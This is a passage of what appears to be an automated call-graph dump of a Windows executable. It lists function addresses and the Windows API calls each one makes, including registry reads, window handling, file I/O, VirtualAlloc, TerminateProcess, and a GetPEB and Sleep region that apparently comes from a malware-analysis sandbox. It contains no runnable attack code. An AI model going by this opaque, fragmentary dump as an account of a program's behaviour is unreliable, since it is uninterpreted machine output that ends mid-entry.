API calls 97493->97494 97494->97491 97494->97493 97497 1824c7 97494->97497 97511 182606 97494->97511 97519 182269 40 API calls 97494->97519 97497->97473 97499 13e684 ___scrt_is_nonwritable_in_current_image 97498->97499 97500 13e695 97499->97500 97501 13e6aa 97499->97501 97593 13f2d9 20 API calls __dosmaperr 97500->97593 97510 13e6a5 __fread_nolock 97501->97510 97576 13918d EnterCriticalSection 97501->97576 97503 13e69a 97594 1427ec 26 API calls __cftof 97503->97594 97505 13e6c6 97577 13e602 97505->97577 97508 13e6d1 97595 13e6ee LeaveCriticalSection __fread_nolock 97508->97595 97510->97476 97512 182617 97511->97512 97513 18261d 97511->97513 97512->97513 97520 1826d7 97512->97520 97513->97494 97516 182742 97515->97516 97517 182731 97515->97517 97516->97497 97518 13dbb3 65 API calls 97517->97518 97518->97516 97519->97494 97521 182714 97520->97521 97522 182703 97520->97522 97521->97512 97524 13dbb3 97522->97524 97525 13dbc1 97524->97525 97526 13dbdd 97524->97526 97525->97526 97527 13dbe3 97525->97527 97528 13dbcd 97525->97528 97526->97521 97533 13d9cc 97527->97533 97536 13f2d9 20 API calls __dosmaperr 97528->97536 97531 13dbd2 97537 1427ec 26 API calls __cftof 97531->97537 97538 13d97b 97533->97538 97536->97531 97537->97526 97539 13d987 ___scrt_is_nonwritable_in_current_image 97538->97539 97546 13918d EnterCriticalSection 97539->97546 97541 13d995 97547 13d9f4 97541->97547 97546->97541 97555 1449a1 97547->97555 97556 13d955 __fread_nolock 26 API calls 97555->97556 97557 1449b0 97556->97557 97558 14f89b __fread_nolock 26 API calls 97557->97558 97559 1449b6 97558->97559 97560 143820 _strftime 21 API calls 97559->97560 97563 13da09 97559->97563 97576->97505 97578 13e624 97577->97578 97579 13e60f 97577->97579 97584 13e61f 97578->97584 97596 13dc0b 97578->97596 97621 13f2d9 20 API calls __dosmaperr 97579->97621 97581 13e614 97622 1427ec 26 API calls __cftof 97581->97622 97584->97508 97588 13d955 __fread_nolock 26 API calls 97589 13e646 97588->97589 97606 14862f 97589->97606 97593->97503 97594->97510 97595->97510 97597 13dc23 97596->97597 97598 13dc1f 97596->97598 97597->97598 97599 13d955 __fread_nolock 26 API calls 97597->97599 97602 144d7a 97598->97602 97600 13dc43 97599->97600 97623 1459be 97600->97623 97603 144d90 97602->97603 97605 13e640 97602->97605 97604 1429c8 _free 20 API calls 97603->97604 97603->97605 97604->97605 97605->97588 97607 148653 97606->97607 97608 14863e 97606->97608 97609 14868e 97607->97609 97613 14867a 97607->97613 97746 13f2c6 20 API calls __dosmaperr 97608->97746 97748 13f2c6 20 API calls __dosmaperr 97609->97748 97612 148643 97621->97581 97622->97584 97624 1459ca ___scrt_is_nonwritable_in_current_image 97623->97624 97625 1459d2 97624->97625 97626 1459ea 97624->97626 97702 13f2c6 20 API calls __dosmaperr 97625->97702 97628 145a88 97626->97628 97632 145a1f 97626->97632 97707 13f2c6 20 API calls __dosmaperr 97628->97707 97629 1459d7 97648 145147 EnterCriticalSection 97632->97648 97636 145a25 97648->97636 97702->97629 97746->97612 97800 113156 97803 113170 97800->97803 97804 113187 97803->97804 97805 1131eb 97804->97805 97806 11318c 97804->97806 97843 1131e9 97804->97843 97808 1131f1 97805->97808 97809 152dfb 97805->97809 97810 113265 PostQuitMessage 97806->97810 97811 113199 97806->97811 97807 1131d0 DefWindowProcW 97844 11316a 97807->97844 97812 1131f8 97808->97812 97813 11321d SetTimer RegisterWindowMessageW 97808->97813 97852 1118e2 10 API calls 97809->97852 97810->97844 97815 1131a4 97811->97815 97816 152e7c 97811->97816 97817 113201 KillTimer 97812->97817 97818 152d9c 97812->97818 97820 113246 CreatePopupMenu 97813->97820 97813->97844 97821 152e68 97815->97821 97822 1131ae 97815->97822 97858 17bf30 34 API calls ___scrt_fastfail 97816->97858 97848 1130f2 Shell_NotifyIconW ___scrt_fastfail 97817->97848 97824 152dd7 MoveWindow 97818->97824 97825 152da1 97818->97825 97819 152e1c 97853 12e499 42 API calls 97819->97853 97820->97844 97857 17c161 27 API calls ___scrt_fastfail 97821->97857 97829 152e4d 97822->97829 97830 1131b9 97822->97830 97824->97844 97832 152da7 97825->97832 97833 152dc6 SetFocus 97825->97833 97829->97807 97856 170ad7 22 API calls 97829->97856 97836 1131c4 97830->97836 97837 113253 97830->97837 97831 152e8e 97831->97807 97831->97844 97832->97836 97838 152db0 97832->97838 97833->97844 97834 113214 97849 113c50 DeleteObject DestroyWindow 97834->97849 97835 113263 97835->97844 97836->97807 97854 1130f2 Shell_NotifyIconW ___scrt_fastfail 97836->97854 97850 11326f 44 API calls ___scrt_fastfail 97837->97850 97851 1118e2 10 API calls 97838->97851 97843->97807 97846 152e41 97855 113837 49 API calls ___scrt_fastfail 97846->97855 97848->97834 97849->97844 97850->97835 97851->97844 97852->97819 97853->97836 97854->97846 97855->97843 97856->97843 97857->97835 97858->97831 97859 1a82440 97873 1a80000 97859->97873 97861 1a824df 97876 1a82330 97861->97876 97879 1a83520 GetPEB 97873->97879 97875 1a8068b 97875->97861 97877 1a82339 Sleep 97876->97877 97878 1a82347 97877->97878 97880 1a8354a 97879->97880 97880->97875 97881 1303fb 97882 130407 ___scrt_is_nonwritable_in_current_image 97881->97882 97910 12feb1 97882->97910 97884 13040e 97885 130561 97884->97885 97888 130438 97884->97888 97937 13083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97885->97937 97887 130568 97938 134e52 28 API calls _abort 97887->97938 97898 130477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97888->97898 97921 14247d 97888->97921 97890 13056e 97939 134e04 28 API calls _abort 97890->97939 97894 130576 97895 130457 97897 1304d8 97929 130959 97897->97929 97898->97897 97933 134e1a 38 API calls 3 library calls 97898->97933 97900 1304de 97902 1304f3 97900->97902 97934 130992 GetModuleHandleW 97902->97934 97904 1304fa 97904->97887 97905 1304fe 97904->97905 97906 130507 97905->97906 97935 134df5 28 API calls _abort 97905->97935 97936 130040 13 API calls 2 library calls 97906->97936 97909 13050f 97909->97895 97911 12feba 97910->97911 97940 130698 IsProcessorFeaturePresent 97911->97940 97913 12fec6 97941 132c94 10 API calls 3 library calls 97913->97941 97915 12fecb 97920 12fecf 97915->97920 97942 142317 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97915->97942 97917 12fee6 97917->97884 97918 12fed8 97918->97917 97943 132cbd 8 API calls 3 library calls 97918->97943 97920->97884 97923 142494 97921->97923 97922 130a8c _ValidateLocalCookies 5 API calls 97924 130451 97922->97924 97923->97922 97924->97895 97925 142421 97924->97925 97926 142450 97925->97926 97927 130a8c _ValidateLocalCookies 5 API calls 97926->97927 97928 142479 97927->97928 97928->97898 97944 132340 97929->97944 97931 13096c GetStartupInfoW 97932 13097f 97931->97932 97932->97900 97933->97897 97934->97904 97935->97906 97936->97909 97937->97887 97938->97890 97939->97894 97940->97913 97941->97915 97942->97918 97943->97920 97944->97931 97945 111098 97950 1142de 97945->97950 97949 1110a7 97951 11a961 22 API calls 97950->97951 97952 1142f5 GetVersionExW 97951->97952 97953 116b57 22 API calls 97952->97953 97954 114342 97953->97954 97955 1193b2 22 API calls 97954->97955 97957 114378 97954->97957 97956 11436c 97955->97956 97959 1137a0 22 API calls 97956->97959 97958 11441b GetCurrentProcess IsWow64Process 97957->97958 97965 1537df 97957->97965 97960 114437 97958->97960 97959->97957 97961 153824 GetSystemInfo 97960->97961 97962 11444f LoadLibraryA 97960->97962 97963 114460 GetProcAddress 97962->97963 97964 11449c GetSystemInfo 97962->97964 97963->97964 97966 114470 GetNativeSystemInfo 97963->97966 97967 114476 97964->97967 97966->97967 97968 11109d 97967->97968 97969 11447a FreeLibrary 97967->97969 97970 1300a3 29 API calls __onexit 97968->97970 97969->97968 97970->97949 97971 11105b 97976 11344d 97971->97976 97973 11106a 98007 1300a3 29 API calls __onexit 97973->98007 97975 111074 97977 11345d __wsopen_s 97976->97977 97978 11a961 22 API calls 97977->97978 97979 113513 97978->97979 97980 113a5a 24 API calls 97979->97980 97981 11351c 97980->97981 98008 113357 97981->98008 97986 11515f 22 API calls 97987 113544 97986->97987 97988 11a961 22 API calls 97987->97988 97989 11354d 97988->97989 97990 11a6c3 22 API calls 97989->97990 97991 113556 RegOpenKeyExW 97990->97991 97992 153176 RegQueryValueExW 97991->97992 97996 113578 97991->97996 97993 153193 97992->97993 97994 15320c RegCloseKey 97992->97994 97995 12fe0b 22 API calls 97993->97995 97994->97996 98006 15321e _wcslen 97994->98006 97997 1531ac 97995->97997 97996->97973 97999 115722 22 API calls 97997->97999 97998 114c6d 22 API calls 97998->98006 98000 1531b7 RegQueryValueExW 97999->98000 98001 1531d4 98000->98001 98003 1531ee ISource 98000->98003 98002 116b57 22 API calls 98001->98002 98002->98003 98003->97994 98004 119cb3 22 API calls 98004->98006 98005 11515f 22 API calls 98005->98006 98006->97996 98006->97998 98006->98004 98006->98005 98007->97975 98009 151f50 __wsopen_s 98008->98009 98010 113364 GetFullPathNameW 98009->98010 98011 113386 98010->98011 98012 116b57 22 API calls 98011->98012 98013 1133a4 98012->98013 98014 1133c6 98013->98014 98015 1133dd 98014->98015 98016 1530bb 98014->98016 98023 1133ee 98015->98023 98018 12fddb 22 API calls 98016->98018 98020 1530c5 _wcslen 98018->98020 98019 1133e8 98019->97986 98021 12fe0b 22 API calls 98020->98021 98022 1530fe __fread_nolock 98021->98022 98024 1133fe _wcslen 98023->98024 98025 113411 98024->98025 98026 15311d 98024->98026 98033 11a587 98025->98033 98028 12fddb 22 API calls 98026->98028 98030 153127 98028->98030 98029 11341e __fread_nolock 98029->98019 98031 12fe0b 22 API calls 98030->98031 98032 153157 __fread_nolock 98031->98032 98034 11a59d 98033->98034 98037 11a598 __fread_nolock 98033->98037 98035 12fe0b 22 API calls 98034->98035 98036 15f80f 98034->98036 98035->98037 98036->98036 98037->98029 98038 1490fa 98039 149107 98038->98039 98043 14911f 98038->98043 98088 13f2d9 20 API calls __dosmaperr 98039->98088 98041 14910c 98089 1427ec 26 API calls __cftof 98041->98089 98044 14917a 98043->98044 98052 149117 98043->98052 98090 14fdc4 21 API calls 2 library calls 98043->98090 98046 13d955 __fread_nolock 26 API calls 98044->98046 98047 149192 98046->98047 98058 148c32 98047->98058 98049 149199 98050 13d955 __fread_nolock 26 API calls 98049->98050 98049->98052 98051 1491c5 98050->98051 98051->98052 98053 13d955 __fread_nolock 26 API calls 98051->98053 98054 1491d3 98053->98054 98054->98052 98055 13d955 __fread_nolock 26 API calls 98054->98055 98056 1491e3 98055->98056 98057 13d955 __fread_nolock 26 API calls 98056->98057 98057->98052 98059 148c3e ___scrt_is_nonwritable_in_current_image 98058->98059 98060 148c46 98059->98060 98065 148c5e 98059->98065 98092 13f2c6 20 API calls __dosmaperr 98060->98092 98062 148d24 98099 13f2c6 20 API calls __dosmaperr 98062->98099 98064 148c4b 98093 13f2d9 20 API calls __dosmaperr 98064->98093 98065->98062 98066 148c97 98065->98066 98069 148ca6 98066->98069 98070 148cbb 98066->98070 98067 148d29 98100 13f2d9 20 API calls __dosmaperr 98067->98100 98094 13f2c6 20 API calls __dosmaperr 98069->98094 98091 145147 EnterCriticalSection 98070->98091 98074 148cb3 98101 1427ec 26 API calls __cftof 98074->98101 98075 148cab 98095 13f2d9 20 API calls __dosmaperr 98075->98095 98076 148cc1 98078 148cf2 98076->98078 98079 148cdd 98076->98079 98083 148d45 __fread_nolock 38 API calls 98078->98083 98096 13f2d9 20 API calls __dosmaperr 98079->98096 98081 148c53 __fread_nolock 98081->98049 98084 148ced 98083->98084 98098 148d1c LeaveCriticalSection __wsopen_s 98084->98098 98085 148ce2 98097 13f2c6 20 API calls __dosmaperr 98085->98097 98088->98041 98089->98052 98090->98044 98091->98076 98092->98064 98093->98081 98094->98075 98095->98074 98096->98085 98097->98084 98098->98081 98099->98067 98100->98074 98101->98081 98102 11f7bf 98103 11f7d3 98102->98103 98104 11fcb6 98102->98104 98106 11fcc2 98103->98106 98107 12fddb 22 API calls 98103->98107 98199 11aceb 23 API calls ISource 98104->98199 98200 11aceb 23 API calls ISource 98106->98200 98109 11f7e5 98107->98109 98109->98106 98110 11f83e 98109->98110 98111 11fd3d 98109->98111 98129 11ed9d ISource 98110->98129 98137 121310 98110->98137 98201 181155 22 API calls 98111->98201 98114 11fef7 98122 11a8c7 22 API calls 98114->98122 98114->98129 98116 12fddb 22 API calls 98134 11ec76 ISource 98116->98134 98118 11a8c7 22 API calls 98118->98134 98119 164600 98124 11a8c7 22 API calls 98119->98124 98119->98129 98120 164b0b 98203 18359c 82 API calls __wsopen_s 98120->98203 98122->98129 98124->98129 98126 130242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98126->98134 98127 11fbe3 98127->98129 98130 164bdc 98127->98130 98136 11f3ae ISource 98127->98136 98128 11a961 22 API calls 98128->98134 98204 18359c 82 API calls __wsopen_s 98130->98204 98132 1300a3 29 API calls pre_c_initialization 98132->98134 98133 164beb 98205 18359c 82 API calls __wsopen_s 98133->98205 98134->98114 98134->98116 98134->98118 98134->98119 98134->98120 98134->98126 98134->98127 98134->98128 98134->98129 98134->98132 98134->98133 98135 1301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98134->98135 98134->98136 98197 1201e0 256 API calls 2 library calls 98134->98197 98198 1206a0 41 API calls ISource 98134->98198 98135->98134 98136->98129 98202 18359c 82 API calls __wsopen_s 98136->98202 98138 1217b0 98137->98138 98139 121376 98137->98139 98489 130242 5 API calls __Init_thread_wait 98138->98489 98140 121390 98139->98140 98141 166331 98139->98141 98206 121940 98140->98206 98494 19709c 256 API calls 98141->98494 98145 1217ba 98148 1217fb 98145->98148 98150 119cb3 22 API calls 98145->98150 98147 16633d 98147->98134 98152 166346 98148->98152 98154 12182c 98148->98154 98149 121940 9 API calls 98151 1213b6 98149->98151 98157 1217d4 98150->98157 98151->98148 98153 1213ec 98151->98153 98495 18359c 82 API calls __wsopen_s 98152->98495 98153->98152 98160 121408 __fread_nolock 98153->98160 98491 11aceb 23 API calls ISource 98154->98491 98490 1301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98157->98490 98158 121839 98492 12d217 256 API calls 98158->98492 98160->98158 98162 16636e 98160->98162 98169 12fddb 22 API calls 98160->98169 98171 12fe0b 22 API calls 98160->98171 98177 12152f 98160->98177 98178 1663b2 98160->98178 98181 166369 98160->98181 98216 11ec40 98160->98216 98496 18359c 82 API calls __wsopen_s 98162->98496 98164 1663d1 98498 195745 54 API calls _wcslen 98164->98498 98165 12153c 98167 121940 9 API calls 98165->98167 98168 121549 98167->98168 98172 1664fa 98168->98172 98174 121940 9 API calls 98168->98174 98169->98160 98170 121872 98493 12faeb 23 API calls 98170->98493 98171->98160 98172->98181 98499 18359c 82 API calls __wsopen_s 98172->98499 98179 121563 98174->98179 98177->98164 98177->98165 98497 18359c 82 API calls __wsopen_s 98178->98497 98179->98172 98182 11a8c7 22 API calls 98179->98182 98184 1215c7 ISource 98179->98184 98181->98134 98182->98184 98183 121940 9 API calls 98183->98184 98184->98170 98184->98172 98184->98181 98184->98183 98187 12167b ISource 98184->98187 98193 114f39 68 API calls 98184->98193 98240 19959f 98184->98240 98243 18f0ec 98184->98243 98252 12effa 98184->98252 98309 17d4ce 98184->98309 98312 19958b 98184->98312 98315 186ef1 98184->98315 98395 19e204 98184->98395 98431 18744a 98184->98431 98185 12171d 98185->98134 98187->98185 98488 12ce17 22 API calls ISource 98187->98488 98193->98184 98197->98134 98198->98134 98199->98106 98200->98111 98201->98129 98202->98129 98203->98129 98204->98133 98205->98129 98207 121981 98206->98207 98213 12195d 98206->98213 98500 130242 5 API calls __Init_thread_wait 98207->98500 98209 12198b 98209->98213 98501 1301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98209->98501 98211 128727 98215 1213a0 98211->98215 98503 1301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98211->98503 98213->98215 98502 130242 5 API calls __Init_thread_wait 98213->98502 98215->98149 98234 11ec76 ISource 98216->98234 98217 12fddb 22 API calls 98217->98234 98218 11fef7 98224 11a8c7 22 API calls 98218->98224 98232 11ed9d ISource 98218->98232 98221 164600 98227 11a8c7 22 API calls 98221->98227 98221->98232 98222 164b0b 98507 18359c 82 API calls __wsopen_s 98222->98507 98224->98232 98226 11a8c7 22 API calls 98226->98234 98227->98232 98229 130242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98229->98234 98230 11fbe3 98230->98232 98233 164bdc 98230->98233 98239 11f3ae ISource 98230->98239 98231 11a961 22 API calls 98231->98234 98232->98160 98508 18359c 82 API calls __wsopen_s 98233->98508 98234->98217 98234->98218 98234->98221 98234->98222 98234->98226 98234->98229 98234->98230 98234->98231 98234->98232 98235 1300a3 29 API calls pre_c_initialization 98234->98235 98237 164beb 98234->98237 98238 1301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98234->98238 98234->98239 98504 1201e0 256 API calls 2 library calls 98234->98504 98505 1206a0 41 API calls ISource 98234->98505 98235->98234 98509 18359c 82 API calls __wsopen_s 98237->98509 98238->98234 98239->98232 98506 18359c 82 API calls __wsopen_s 98239->98506 98510 197f59 98240->98510 98242 1995af 98242->98184 98244 117510 53 API calls 98243->98244 98245 18f126 98244->98245 98643 119e90 98245->98643 98247 18f136 98248 18f15b 98247->98248 98249 11ec40 256 API calls 98247->98249 98251 18f15f 98248->98251 98671 119c6e 98248->98671 98249->98248 98251->98184 98253 119c6e 22 API calls 98252->98253 98254 12f012 98253->98254 98256 12fddb 22 API calls 98254->98256 98259 16f0a8 98254->98259 98257 12f02b 98256->98257 98258 12fe0b 22 API calls 98257->98258 98261 12f03c 98258->98261 98260 12f0a4 98259->98260 98761 189caa 39 API calls 98259->98761 98268 12f0b1 98260->98268 98724 11b567 98260->98724 98729 116246 98261->98729 98265 11a961 22 API calls 98267 12f04f 98265->98267 98266 16f10a 98266->98268 98269 16f112 98266->98269 98270 116246 CloseHandle 98267->98270 98705 12fa5b 98268->98705 98272 11b567 39 API calls 98269->98272 98273 12f056 98270->98273 98277 12f0b8 98272->98277 98274 117510 53 API calls 98273->98274 98275 12f062 98274->98275 98276 116246 CloseHandle 98275->98276 98278 12f06c 98276->98278 98279 16f127 98277->98279 98280 12f0d3 98277->98280 98733 115745 98278->98733 98283 12fe0b 22 API calls 98279->98283 98282 116270 22 API calls 98280->98282 98286 12f0db 98282->98286 98284 16f12c 98283->98284 98288 16f140 98284->98288 98762 12f866 ReadFile SetFilePointerEx 98284->98762 98710 12f141 98286->98710 98299 16f144 __fread_nolock 98288->98299 98763 180e85 22 API calls ___scrt_fastfail 98288->98763 98289 16f0a0 98760 116216 CloseHandle ISource 98289->98760 98290 12f085 98741 1153de 98290->98741 98291 12f0ea 98291->98299 98757 1162b5 22 API calls 98291->98757 98297 12f093 98756 1153c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98297->98756 98300 12f09a 98300->98260 98301 16f069 98300->98301 98759 17ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 98301->98759 98302 12f0fe 98303 12f138 98302->98303 98304 116246 CloseHandle 98302->98304 98303->98184 98306 12f12c 98304->98306 98306->98303 98758 116216 CloseHandle ISource 98306->98758 98307 16f080 98307->98260 98808 17dbbe lstrlenW 98309->98808 98313 197f59 120 API calls 98312->98313 98314 19959b 98313->98314 98314->98184 98316 11a961 22 API calls 98315->98316 98317 186f1d 98316->98317 98318 11a961 22 API calls 98317->98318 98319 186f26 98318->98319 98320 186f3a 98319->98320 98321 11b567 39 API calls 98319->98321 98322 117510 53 API calls 98320->98322 98321->98320 98327 186f57 _wcslen 98322->98327 98323 186fbc 98325 117510 53 API calls 98323->98325 98324 1870bf 98326 114ecb 94 API calls 98324->98326 98328 186fc8 98325->98328 98329 1870d0 98326->98329 98327->98323 98327->98324 98394 1870e9 98327->98394 98333 11a8c7 22 API calls 98328->98333 98336 186fdb 98328->98336 98330 1870e5 98329->98330 98331 114ecb 94 API calls 98329->98331 98332 11a961 22 API calls 98330->98332 98330->98394 98331->98330 98334 18711a 98332->98334 98333->98336 98335 11a961 22 API calls 98334->98335 98340 187126 98335->98340 98337 187027 98336->98337 98338 187005 98336->98338 98341 11a8c7 22 API calls 98336->98341 98339 117510 53 API calls 98337->98339 98342 1133c6 22 API calls 98338->98342 98343 187034 98339->98343 98344 11a961 22 API calls 98340->98344 98341->98338 98345 18700f 98342->98345 98346 18703d 98343->98346 98347 187047 98343->98347 98348 18712f 98344->98348 98349 117510 53 API calls 98345->98349 98350 11a8c7 22 API calls 98346->98350 98973 17e199 GetFileAttributesW 98347->98973 98352 11a961 22 API calls 98348->98352 98354 18701b 98349->98354 98350->98347 98353 187138 98352->98353 98357 117510 53 API calls 98353->98357 98358 116350 22 API calls 98354->98358 98355 187050 98356 187063 98355->98356 98359 114c6d 22 API calls 98355->98359 98361 117510 53 API calls 98356->98361 98367 187069 98356->98367 98360 187145 98357->98360 98358->98337 98359->98356 98813 11525f 98360->98813 98363 1870a0 98361->98363 98974 17d076 57 API calls 98363->98974 98364 187166 98366 114c6d 22 API calls 98364->98366 98368 187175 98366->98368 98367->98394 98369 1871a9 98368->98369 98370 114c6d 22 API calls 98368->98370 98371 11a8c7 22 API calls 98369->98371 98373 187186 98370->98373 98372 1871ba 98371->98372 98855 116350 98372->98855 98373->98369 98376 116b57 22 API calls 98373->98376 98378 18719b 98376->98378 98377 116350 22 API calls 98379 1871d6 98377->98379 98380 116b57 22 API calls 98378->98380 98381 116350 22 API calls 98379->98381 98380->98369 98382 1871e4 98381->98382 98383 117510 53 API calls 98382->98383 98384 1871f0 98383->98384 98864 17d7bc 98384->98864 98386 187201 98387 17d4ce 4 API calls 98386->98387 98388 18720b 98387->98388 98389 117510 53 API calls 98388->98389 98392 187239 98388->98392 98390 187229 98389->98390 98918 182947 98390->98918 98393 114f39 68 API calls 98392->98393 98393->98394 98394->98184 98396 11a961 22 API calls 98395->98396 98397 19e21b 98396->98397 98398 117510 53 API calls 98397->98398 98399 19e22a 98398->98399 98400 116270 22 API calls 98399->98400 98401 19e23d 98400->98401 98402 117510 53 API calls 98401->98402 98403 19e24a 98402->98403 98404 19e262 98403->98404 98405 19e2c7 98403->98405 98407 11b567 39 API calls 98404->98407 98406 117510 53 API calls 98405->98406 98408 19e2cc 98406->98408 98409 19e267 98407->98409 98410 19e2d9 98408->98410 98411 19e314 98408->98411 98409->98410 98413 19e280 98409->98413 98412 119c6e 22 API calls 98410->98412 98414 19e32c 98411->98414 98416 11b567 39 API calls 98411->98416 98428 19e2e6 98412->98428 98415 116d25 22 API calls 98413->98415 98417 19e345 98414->98417 98420 11b567 39 API calls 98414->98420 98419 19e28d 98415->98419 98416->98414 98418 11a8c7 22 API calls 98417->98418 98421 19e35f 98418->98421 98422 116350 22 API calls 98419->98422 98420->98417 99014 1792c8 98421->99014 98424 19e29b 98422->98424 98425 116d25 22 API calls 98424->98425 98426 19e2b4 98425->98426 98427 116350 22 API calls 98426->98427 98430 19e2c2 98427->98430 98428->98184 99033 1162b5 22 API calls 98430->99033 98432 187469 98431->98432 98433 187474 98431->98433 98434 11b567 39 API calls 98432->98434 98436 11a961 22 API calls 98433->98436 98474 187554 98433->98474 98434->98433 98435 12fddb 22 API calls 98437 187587 98435->98437 98439 187495 98436->98439 98438 12fe0b 22 API calls 98437->98438 98440 187598 98438->98440 98441 11a961 22 API calls 98439->98441 98442 116246 CloseHandle 98440->98442 98443 18749e 98441->98443 98444 1875a3 98442->98444 98445 117510 53 API calls 98443->98445 98446 11a961 22 API calls 98444->98446 98447 1874aa 98445->98447 98449 1875ab 98446->98449 98448 11525f 22 API calls 98447->98448 98450 1874bf 98448->98450 98451 116246 CloseHandle 98449->98451 98452 116350 22 API calls 98450->98452 98453 1875b2 98451->98453 98454 1874f2 98452->98454 98455 117510 53 API calls 98453->98455 98456 18754a 98454->98456 98458 17d4ce 4 API calls 98454->98458 98457 1875be 98455->98457 98460 11b567 39 API calls 98456->98460 98459 116246 CloseHandle 98457->98459 98461 187502 98458->98461 98463 1875c8 98459->98463 98460->98474 98461->98456 98462 187506 98461->98462 98464 119cb3 22 API calls 98462->98464 98465 115745 5 API calls 98463->98465 98466 187513 98464->98466 98467 1875e2 98465->98467 99034 17d2c1 26 API calls 98466->99034 98468 1875ea 98467->98468 98469 1876de GetLastError 98467->98469 98472 1153de 27 API calls 98468->98472 98471 1876f7 98469->98471 99038 116216 CloseHandle ISource 98471->99038 98475 1875f8 98472->98475 98474->98435 98486 1876a4 98474->98486 99035 1153c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98475->99035 98476 18751c 98476->98456 98478 187645 98479 12fddb 22 API calls 98478->98479 98482 187679 98479->98482 98480 187619 99036 17ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 98480->99036 98481 1875ff 98481->98478 98481->98480 98484 11a961 22 API calls 98482->98484 98485 187686 98484->98485 98485->98486 99037 17417d 22 API calls __fread_nolock 98485->99037 98486->98184 98488->98187 98489->98145 98490->98148 98491->98158 98492->98170 98493->98170 98494->98147 98495->98181 98496->98181 98497->98181 98498->98179 98499->98181 98500->98209 98501->98213 98502->98211 98503->98215 98504->98234 98505->98234 98506->98232 98507->98232 98508->98237 98509->98232 98548 117510 98510->98548 98514 198281 98515 19844f 98514->98515 98520 19828f 98514->98520 98612 198ee4 60 API calls 98515->98612 98518 19845e 98519 19846a 98518->98519 98518->98520 98534 197fd5 ISource 98519->98534 98584 197e86 98520->98584 98521 117510 53 API calls 98536 198049 98521->98536 98526 1982c8 98599 12fc70 98526->98599 98529 1982e8 98605 18359c 82 API calls __wsopen_s 98529->98605 98530 198302 98606 1163eb 22 API calls 98530->98606 98533 1982f3 GetCurrentProcess TerminateProcess 98533->98530 98534->98242 98535 198311 98607 116a50 22 API calls 98535->98607 98536->98514 98536->98521 98536->98534 98603 17417d 22 API calls __fread_nolock 98536->98603 98604 19851d 42 API calls _strftime 98536->98604 98538 19832a 98547 198352 98538->98547 98608 1204f0 22 API calls 98538->98608 98540 1984c5 98540->98534 98544 1984d9 FreeLibrary 98540->98544 98541 198341 98609 198b7b 75 API calls 98541->98609 98544->98534 98547->98540 98610 1204f0 22 API calls 98547->98610 98611 11aceb 23 API calls ISource 98547->98611 98613 198b7b 75 API calls 98547->98613 98549 117525 98548->98549 98565 117522 98548->98565 98550 11755b 98549->98550 98551 11752d 98549->98551 98553 1550f6 98550->98553 98556 11756d 98550->98556 98561 15500f 98550->98561 98614 1351c6 26 API calls 98551->98614 98617 135183 26 API calls 98553->98617 98554 11753d 98560 12fddb 22 API calls 98554->98560 98615 12fb21 51 API calls 98556->98615 98557 15510e 98557->98557 98562 117547 98560->98562 98564 12fe0b 22 API calls 98561->98564 98570 155088 98561->98570 98563 119cb3 22 API calls 98562->98563 98563->98565 98566 155058 98564->98566 98565->98534 98571 198cd3 98565->98571 98567 12fddb 22 API calls 98566->98567 98568 15507f 98567->98568 98569 119cb3 22 API calls 98568->98569 98569->98570 98616 12fb21 51 API calls 98570->98616 98572 11aec9 22 API calls 98571->98572 98573 198cee CharLowerBuffW 98572->98573 98618 178e54 98573->98618 98577 11a961 22 API calls 98578 198d2a 98577->98578 98625 116d25 98578->98625 98580 198d3e 98581 1193b2 22 API calls 98580->98581 98583 198d48 _wcslen 98581->98583 98582 198e5e _wcslen 98582->98536 98583->98582 98638 19851d 42 API calls _strftime 98583->98638 98585 197ea1 98584->98585 98589 197eec 98584->98589 98586 12fe0b 22 API calls 98585->98586 98587 197ec3 98586->98587 98588 12fddb 22 API calls 98587->98588 98587->98589 98588->98587 98590 199096 98589->98590 98591 1992ab ISource 98590->98591 98598 1990ba _strcat _wcslen 98590->98598 98591->98526 98592 11b6b5 39 API calls 98592->98598 98593 11b567 39 API calls 98593->98598 98594 11b38f 39 API calls 98594->98598 98595 13ea0c 21 API calls ___std_exception_copy 98595->98598 98596 117510 53 API calls 98596->98598 98598->98591 98598->98592 98598->98593 98598->98594 98598->98595 98598->98596 98642 17efae 24 API calls _wcslen 98598->98642 98600 12fc85 98599->98600 98601 12fd1d VirtualAlloc 98600->98601 98602 12fceb 98600->98602 98601->98602 98602->98529 98602->98530 98603->98536 98604->98536 98605->98533 98606->98535 98607->98538 98608->98541 98609->98547 98610->98547 98611->98547 98612->98518 98613->98547 98614->98554 98615->98554 98616->98553 98617->98557 98620 178e74 _wcslen 98618->98620 98619 178f63 98619->98577 98619->98583 98620->98619 98621 178ea9 98620->98621 98622 178f68 98620->98622 98621->98619 98639 12ce60 41 API calls 98621->98639 98622->98619 98640 12ce60 41 API calls 98622->98640 98626 116d91 98625->98626 98627 116d34 98625->98627 98628 1193b2 22 API calls 98626->98628 98627->98626 98629 116d3f 98627->98629 98635 116d62 __fread_nolock 98628->98635 98630 154c9d 98629->98630 98631 116d5a 98629->98631 98632 12fddb 22 API calls 98630->98632 98641 116f34 22 API calls 98631->98641 98634 154ca7 98632->98634 98636 12fe0b 22 API calls 98634->98636 98635->98580 98637 154cda 98636->98637 98638->98582 98639->98621 98640->98622 98641->98635 98642->98598 98685 116270 98643->98685 98645 119fd2 98691 11a4a1 98645->98691 98647 119fec 98647->98247 98650 15f7c4 98703 1796e2 84 API calls __wsopen_s 98650->98703 98651 15f699 98658 12fddb 22 API calls 98651->98658 98652 11a405 98652->98647 98704 1796e2 84 API calls __wsopen_s 98652->98704 98656 11a6c3 22 API calls 98670 119eb5 98656->98670 98657 15f7d2 98659 